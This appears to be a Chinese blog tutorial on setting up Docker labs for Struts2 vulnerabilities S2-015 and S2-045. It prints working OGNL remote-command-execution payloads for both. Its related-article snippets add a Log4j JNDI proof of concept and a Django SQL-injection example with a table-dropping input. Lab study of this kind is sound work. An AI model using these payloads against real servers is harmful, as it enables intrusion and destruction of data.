Str2 漏洞 搭建 简单学习

最新推荐文章于 2024-11-06 07:31:52 发布
原创 最新推荐文章于 2024-11-06 07:31:52 发布 · 839 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了Struts2的几个重要漏洞,包括S2-015、S2-045和S2-046。针对每个漏洞,提供了官方链接以及受影响的版本范围。特别提到,S2-015可以通过执行Message触发,修复措施是尽快将Struts2更新到最新版本以避免风险。对于Str-048,文章表明分析尚未完成。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

struts2_s2-015

官方:https://cwiki.apache.org/confluence/display/WW/S2-015

1感谢大佬的项目:https://github.com/Medicean/VulApps/tree/master/s/struts2/

1拉取景象
docker pull medicean/vulapps:s_struts2_s2-015

1运行
docker run -dt(后台运行) --name sqli-labs (名字) -p 80:80 (本地,docker端口 映射) --rm (docker 停止后 ,删除产生所有的镜像) 
docker run -dt --name struts_s2-015 -p 80:8080 --rm  medicean/vulapps:s_struts2_s2-015

在这里插入图片描述

POC:
/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action
改变 exec中即可

在这里插入图片描述
Message 执行了

struts2-045

1拉取景象
docker pull medicean/vulapps:s_struts2_s2-045

1运行
docker run -dt(后台运行) --name sqli-labs (名字) -p 80:80 (本地,docker端口 映射) --rm (docker 停止后 ,删除产生所有的镜像) 
docker run -dt --name struts_s2-045 -p 80:8080 --rm  medicean/vulapps:s_struts2_s2-045

在这里插入图片描述

POC1:
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

最低0.47元/天 解锁文章

200万优质内容无限畅学
【C++实战篇】str1、str2连接,分别用定长存储、堆存储、块链存储实现
程序员,他们想的是什么?他们想的永远都是技术,他们崇尚的也永远都是技术。
06-09 1444
串连接三种方式实现(定长、堆、块链)1 定长存储2 堆分配存储3 块链存储思路(1):两个子串先分成块,再连接思路(2)先连接,再分块存储 字符串str1、str2连接,分别用定长存储、堆分配存储、块链存储实现,不能直接调用函数库中自带的连接函数。 1 定长存储 #include<iostream> using namespace std; #define MAXLEN 255//定义串的最大长度为255,<=255以内的任何串可用 typedef struct { char ch[MA
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045
HAKUNAMATATATTA的博客
12-21 3102
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
漏洞靶场搭建
nejore的博客
06-08 1033
vulhub基础环境搭建
【Python】STR2漏洞综合扫描+源码分析
浪子燕青的博客
01-18 3216
花了半天写完的~~ 还不错~~ 现在同目录下创建url.txt  将收集到的url放进去  就ok~~ 最后成功的会在同目录下生产success.txt~~ 附上源码~~~ # -*-coding:utf-8-*- import requests import time print unicode(''' 作者:浪子燕青 作者QQ:982722261
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 1万+
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
str2
iteye_20820的博客
12-13 217
标签: 1. addFieldError("name","this is name"); 带格式 2. 3. 取值栈中的值 取actionStatct中的值 参数没有用action参数接收的,可以在#parameters.r1的方式取出 获取web元素: ...
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞
qq_34914659的博客
08-09 3399
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.youkuaiyun.com/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
【安全漏洞Struts2漏洞集合总结
HBohan的博客
01-24 3477
总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署。
服务器解析漏洞与cms靶场搭建教程
wutiangui的博客
07-01 2256
解析漏洞主要是一些特殊文件被Apache、IIS、Nginx等Web服务器在某种情况下解释成脚本文件格式并得以执行而产生的漏洞Apache(2.4.0~2.4.29)解析漏洞 CVE-2017-15715测试方法:test.php. 抓包修改.为test.php%0aApache AddHandler解析漏洞:从右到左识别httd.conf开启:AddHandler application/x-httpd-php .phpIIS6 解析漏洞:*.asp;.jpg作为asp解析。
安全漏洞之Log4j2漏洞复现绕过分析
热门推荐
kali_Ma的博客
12-12 2万+
0x00 介绍 Log4j2是Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}"); } POC虽然简单,但是搭建LDAP环境显得有点复杂,m
Struts2漏洞
2403_82795493的博客
02-20 4072
Struts 是Apache软件基金会(ASF)赞助的一个开源项目,通过采用JavaServlet/JSP技术,实现基于Java EEWeb应用的MVC设计模式的应用框架,Struts 2Struts的下一代产品,是在 Struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。Struts2框架广泛应用于政府、公安、交通、金融行业和运营商的网站建设,作为网站开发的底层模板使用。
java struts2 漏洞复现合集
whatday的专栏
08-31 8218
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
漏洞练习环境搭建笔记
qq_32812063的博客
11-21 1185
漏洞环境
"Str2$"变量未定义(学生信息管理系统问题之一)
sunny_LI
08-04 2089
 问题:Str2$变量未定义。   我的解决办法:(试了一下不行,定义都有问题)     dim str2$ as Boolean     str2$ = MsgBox("是否删除当前记录?", vbOKCancel, "删除当前记录")         If str2$ = vbOK Then     网上的解决办法:   1. Dim str2$ A
nuPlan又一SOTA!赵行团队新作STR2:运动规划的重新出发,仿真闭环的强大泛化!...
CV_Autobot的博客
11-06 951
点击下方卡片,关注“自动驾驶之心”公众号戳我->领取自动驾驶近15个方向学习路线今天自动驾驶之心为大家分享上海期智研究院等团队的最新工作—STR2!运动规划新方案,直接SOTA!如果您有相关工作需要分享,请在文末联系我们!自动驾驶课程学习与技术交流群事宜,也欢迎添加小助理微信AIDriver004做进一步咨询>>点击进入→自动驾驶之心『运动规划』技术交流群论文作者| Qiao...
判断字符串str2是否整体包含在字符串str1中
m0_73497041的博客
05-12 1489
C语言作业
题目: 字符串str1和str2 ,str1是否包含str2,如果包含str2str开始的位置,如何做到时间复杂度O(N)完成?
reept的博客
06-03 208
KMP算法;字符串;
字符串函数-C语言基础知识入门
qq_61638928的博客
10-03 1013
几个字符串函数
给定两个字符串str1和str2,查找str2str1中出现的位置
xl365t
11-18 1万+
给定string str1和string str2,编写一个库函数,返回str2str1中的位置。 如:str1为"ABCDLANCEXYZ",str2为"LANCE",则返回位置5。如果没有找到,返回-1。(起始位置从1开始) // findSubStrPosition.c #include int findSubStrPosition(const char *pStr1, const
Django注入漏洞环境搭建
最新发布
03-08
### 创建带有SQL注入漏洞的Django应用环境 出于教育目的,在受控环境中构建具有已知漏洞的应用程序可以帮助理解其工作原理并学习防御措施。下面介绍如何设置一个存在特定SQL注入漏洞的Django应用程序。 #### 安装依赖项 确保安装了Python以及pip工具之后,可以创建一个新的虚拟环境来隔离项目所需的包: ```bash python3 -m venv myvenv source myvenv/bin/activate # Linux/MacOS myvenv\Scripts\activate # Windows ``` 接着安装指定版本的Django,这里选择容易受到CVE-2021-35042影响的一个版本[^2]: ```bash pip install django==3.2.9 ``` #### 构建易受攻击的应用逻辑 新建一个名为`insecure_app`的应用,并编辑其中views.py文件引入不安全的做法。例如,对于QuerySet.order_by()方法不当使用用户输入参数的情况如下所示: ```python from django.shortcuts import render from .models import Entry def vulnerable_view(request): order = request.GET.get('orderby', 'id') entries = Entry.objects.all().order_by(order) # 不安全的操作 context = {'entries': entries} return render(request, 'list_entries.html', context) ``` 上述代码片段展示了当开发者直接将未经验证或清理过的GET请求参数应用于数据库查询排序时所存在的风险。 #### 设置模型与迁移 定义简单的数据表结构以便于测试,比如博客文章条目(Entry),并在settings.py里配置好SQLite或其他支持的关系型数据库连接信息后运行命令完成初始化操作: ```python class Entry(models.Model): title = models.CharField(max_length=200) content = models.TextField() def __str__(self): return self.title ``` 最后执行同步数据库架构变更的任务: ```bash python manage.py makemigrations insecure_app python manage.py migrate ``` 此时已经成功建立起了一个具备潜在SQL注入隐患的小型Web服务端实例,仅供内部实验用途,请勿部署至公网环境以免遭受真实世界的恶意利用。 #### 测试漏洞的存在性 启动开发服务器并通过浏览器访问页面尝试不同的URL参数组合观察响应行为变化,如`?orderby=-title`正常显示按标题降序排列的结果集;而像`?orderby=id; DROP TABLE auth_user -- `这样的特殊构造则可能引发异常错误提示甚至更严重的后果取决于具体上下文条件[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值